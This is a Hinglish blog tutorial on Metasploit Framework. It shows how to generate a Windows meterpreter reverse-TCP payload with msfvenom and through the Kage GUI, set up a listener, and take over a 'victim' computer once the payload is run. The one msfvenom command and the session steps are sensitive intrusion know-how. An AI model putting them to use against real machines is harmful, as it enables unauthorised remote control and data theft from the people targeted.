How to use Metasploit Framework ?

Is article mai hum apko Metasploit Framework ke bare mai bata rahe hai. Metasploit Framework ka use kyu kiya jata hai , kaise kiya jata hai. Yaha apko sab practically btaya ja raha hai.

Hum yaha apko Metasploit Framework ko command base or graphical mode dono mai use karke bata rahe hai. Jaise ki hum jante hai Metasploit Framework ka GUI Mode bhi new release kiya gaya hai.

Aise mai Metasploit Framework ka GUI mode ko release isliye kiya gaya hai. Kyoki new users ke liye command base mai use karne mai problem hoti hai. Aise mai veh GUI mode ka use kar sakte hai.

Hum yaha apko Metasploit Framework ka use karke payload generate karke bhi bata rahe hai. Sath hi Computer ko infected karke bhi apko practically bata rahe hai.

Note- This article is only for educational purpose. Don’t miss use your knowledge and skills

Metasploit Framework

Metasploit Framework ke bare mai sabhi ko pata hi hota hai. Hackers sabse jada Metasploit Framework ka use karke hi payloads ko create karte hai. Yaha apko bahut tarah ke formats mai payload create karne ka option mil jata hai.

How to use Metasploit Framework in GUI Mode.

Yaha sabse pahle apko Metasploit Framework ka GUI Mode ke bare mai btaya ja raha hai. Sabse pahle apko ek file ko dwonload karna hota hai. https://github.com/Zerx0r/Kage/releases.

Yaha aap dekh sakte hai apko windows ke liye bhi iska setup mil jata hai. Hum yaha kali Linux mai iska use karke bata rahe hai. Yeh file download karne ke baad ise execute permission deni hoti hai.

Yaha permission dene ke baad aap Metasploit Framework ko direct run kar sakte hai. Jaise Double click karke kisi software ko hum run karte hai. Yeh run hone ke baad kuch is tarah show hota hai.

Yaha apko yeh start ke icon par click karna hota hai. Click karne ke baad username or password automatic hi generate ho jate hai. Kuch is tarah se yeh apko show hota hai.

Yeh sab karne ke baad aap ise cut karke connect par click kar sakte hai. Yaha aap dekh payege username or password apne aap hi fill ho jate hai.

Yaha apke samne yeh Metasploit Framework ka GUI Mode kuch is tarah se open hota hai. Apko yaha kisi tarah ki command run nahi karni hoti hai. Yaha aap image mai dekh sakte hai.

Metasploit Framework

Yaha aap dekh sakte hai. Humne yaha local IP address diya hai or payload ko select kiya hai. Yaha apko Metasploit Framework ke sabhi payloads show ho jate hai.

Yeh sab karne ke baad apko create par click karna hota hai. Create par click karne ke baad apka listener start ho jata hai. Jaise hum Command line mai listener ko set karte hai.

Yaha aap dekh sakte hai kuch is tarah se payload ko generate kiya jata hai. Payload ka name, format, Lhost, lport ko set karna hota hai. Yeh sab karne ke baad generate par click karna hota hai.

Yeh payload create hone ke baad apko kage ke folder mai hi mil jata hai. Yaha yeh payload ko jab victim apne device par run karta hai. Aise mai Hackers ko session mil jata hai.

Metasploit Framework

Yaha dashboard ke niche hi sessions ka option apko mil jata hai. Aap yaha interact par click karke dekh sakte hai. Apko sabhi options yaha mil jate hai. Kuch is tarah.

Metasploit Framework

Yaha aap dekh sakte hai. Jaise hum command line ke through screenshot, System information, File upload jaise work karte hai aise hi yaha bhi kar sakte hai.

Metasploit in Command Base

Jaise hu MetaSploit Framework ka use GUI Mode mai karte hai. Aise hi command base mai bhi iska use kiya jata hai. Sabse pahle apko payload ko generate karna hota hai. Kuch is tarah.

Aap yaha terminal mai msfvenom likh kar help dekh sakte hai. Yaha apko sab bata diya jata hai kaise payload ko create kiya ja sakta hai. Kuch is tarah.

Metasploit Framework

Yaha apko sabhi information mil jati hai kya alphabet ko kis liye use kiya jata hai. Jaise hum yaha payload generate kar rahe hai. Yaha f ka use format ke liye kiya gaya hai or a ka use architecture ke liye kiya gaya hai.

Command= msfvenom -p windows/meterpreter/reverse_tcp lhost=(YourIpaddress) lport=(yourport) -f exe -a x86 > (payloadname).

Yeh sab karne ke baad apko Metasploit Framework ko run karna hota hai. Yaha msfconsole likh kar bhi aap run kar sakte hai. Yeh kuch is tarah se apke samne run hota hai.

Metasploit Framework

Yeh sab run hone ke baad apko listener ko set karna hota hai. Yaha apko sab manually karna hota hai. Metasploit Framework gui mode mai commands nahi deni hoti hai.

Apko bhi yaha kuch is tarah se hi commands deni hoti hai. Yaha aap dekh sakte hai hume ek error show ho rahi hai. Apko port number change karna hota hai.

Jaise payload create karne mai port number 4444 diya gaya hai vaha apko dusra port number dena hota hai. Yeh sab karne ke baad aap dubara se listener ko setup kar sakte hai.

Yaha aap dekh sakte hai port number change karne par listener start ho gaya hai. Yeh sab karne ke baad victim ke device mai jab payload run hota hai Hackers ko session mil jata hai.

Metasploit Framework

Yaha session bane par apke samne bhi kuch is tarah se show ho jata hai. Aap yah help command likh kar dekh sakte hai kya kya commands ka aap use kar sakte hai.

Metasploit Framework

Yaha help command dene par apko bahut sari commands show ho jati hai. Aap sabhi ka use kar sakte hai. Hum apko yaha kuch commands ka use karke bata rahe hai.

Metasploit Framework

The Conclusion

Main umeed karta hu ki apko Metasploit Framework ke bare mai pata chal gaya hoga. Humne yaha apko Metasploit Framework ko GUI or command base mai dono mai use karke btaya hai.

Yeh sab apko educational purpose ke liye btaya gaya hai. Yaha aap iska miss use kabhi bhi mat karen. Yeh apko ek hi payload ko create karna btaya gaya hai.

Aise hi bahut tarah ke payloads ko generate kiya jata hai. Yaha apko list mil jati hai android ke liye bhi payload ko generate kiya ja sakta hai. Apko yaha bahut sare payloads mil jate hai.

Yaha sabhi ke bare mai bata pana possible nahi hota hai. Aap yaha kisi bhi tarah ke payload ka use karte hai apko aise hi use karna hota hai. Yeh sab humne apne hi PC par kiya hai.

Agar apko Metasploit Framework use karne mai kisi bhi tarah ki error milti hai to aap comment mai puch sakte hai. Apka koi bhi question ho to aap comment mai humse puch sakte hai.

Apko humara yeh article acha lage to ise share jarur karen. Humne yaha bahut sare Hacking ke articles likhe hai aap unhe bhi padh sakte hai. Humare blog ko subscribe jarur karen.

Sharing is Caring

Thankyou

Be the first to comment

Leave a Reply

Your email address will not be published.


*